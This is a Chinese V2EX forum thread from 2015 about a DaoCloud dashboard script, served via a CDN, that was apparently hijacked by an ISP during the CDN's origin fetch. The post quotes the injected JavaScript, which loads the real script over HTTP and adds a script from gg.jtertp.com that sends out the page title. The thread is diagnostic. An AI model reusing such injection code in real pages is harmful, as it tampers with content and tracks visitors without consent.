V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
V2EX 提问指南
wzxjohn
V2EX  ›  问与答

今天居然遇到了 DaoCloud 被 HTTPS 劫持?

  •  
  •   wzxjohn · 2015-11-04 21:45:45 +08:00 · 1529 次点击
    这是一个创建于 3311 天前的主题,其中的信息可能已经有所发展或是发生改变。
    今天访问 DaoCloud 的时候突然控制面板卡吃豆人了,仔细一看发现居然是因为加载了 HTTP 的资源被 Chrome 拦住了,打开控制台发现是这个 JS :
    https://dn-daodashboard-prod.qbox.me/app/958e675a.app.js
    正常情况应该是一大串,但是我得到的是:

    document.write("<script language='javascript' src='http://dn-daodashboard-prod.qbox.me/app/958e675a.app.js?_vv=20080808'></script>");if(top.location==self.location){document.write("<script language='javascript' src='http://gg.jtertp.com:7777/rs/rs.php?src=p0005&t="+encodeURIComponent(document.title)+"&ci=140380449942919'></script>");}

    搜了一下发现 gg.jtertp.com 似乎是电信的劫持?感觉真是好奇怪!电信居然已经可以进行 HTTPS 劫持了?!
    求各路大神分析原因。。。
    PS :证书应该没有问题,是 GeoTrust 的。
    PSS :科学上网出国之后无此现象,不挂科学上网同网络环境下 3 台机器不同浏览器均出现这个现象
    12 条回复    2016-11-05 12:26:52 +08:00
    Laforet
        1
    Laforet  
       2015-11-04 21:53:07 +08:00
    把证书保存出来对比一下。

    不过看你的描述应该是那个域名上所有的请求都被劫持到了 http 上才会出现混合内容
    hgc81538
        2
    hgc81538  
       2015-11-04 21:59:22 +08:00
    應該是源被劫持了
    https://www.v2ex.com/t/212885
    lhbc
        3
    lhbc  
       2015-11-04 23:34:56 +08:00 via Android
    某 CDN 回源被劫持
    运营商真变态啊, IDC 之间的网络也搞劫持
    运营商为推广全面 https 化真是费尽心机啊
    wzxjohn
        4
    wzxjohn  
    OP
       2015-11-04 23:47:39 +08:00
    @Laforet 这样的话证书就不可能对了,所以肯定不是全劫持到 HTTP
    @hgc81538
    @lhbc 我看了那篇文章,但是这个不能解释为啥连七牛返回的 Header 都被改掉了。。。
    hgc81538
        5
    hgc81538  
       2015-11-04 23:58:29 +08:00 via iPhone
    @wzxjohn 因為運營商劫持了源與 cdn 的流量,它想更改什麼都可以
    Laforet
        6
    Laforet  
       2015-11-05 05:30:02 +08:00
    @lhbc
    @wzxjohn
    @hgc81538

    长见识了,居然这样也可以
    wzxjohn
        7
    wzxjohn  
    OP
       2015-11-05 09:38:10 +08:00
    @hgc81538 劫持回源流量怎么可能 CDN 服务器返回的 Header 也被改了。。。
    hgc81538
        8
    hgc81538  
       2015-11-05 10:21:39 +08:00 via iPhone
    @wzxjohn 用戶請求文件, cdn 沒文件找源, cdn 向源請求文件,運營商劫持通訊, cdn 收到被竄改的內容,包括 header
    wzxjohn
        9
    wzxjohn  
    OP
       2015-11-05 10:23:31 +08:00
    @hgc81538 你还是没懂我的意思,本身七牛 CDN 服务器会返回一些固定的头,但是被劫持的文件却没有这些头。。。
    Senorsen
        10
    Senorsen  
       2016-11-05 12:00:50 +08:00
    可怕,我说怎么最近 daocloud 首页这么卡…

    CDN 回源时劫持,真是个厉害的新套路
    Senorsen
        11
    Senorsen  
       2016-11-05 12:02:39 +08:00
    呃… 居然是个老帖
    wzxjohn
        12
    wzxjohn  
    OP
       2016-11-05 12:26:52 +08:00
    @Senorsen 哈哈哈~很久之前啦~
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   4615 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 31ms · UTC 04:05 · PVG 12:05 · LAX 20:05 · JFK 23:05
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.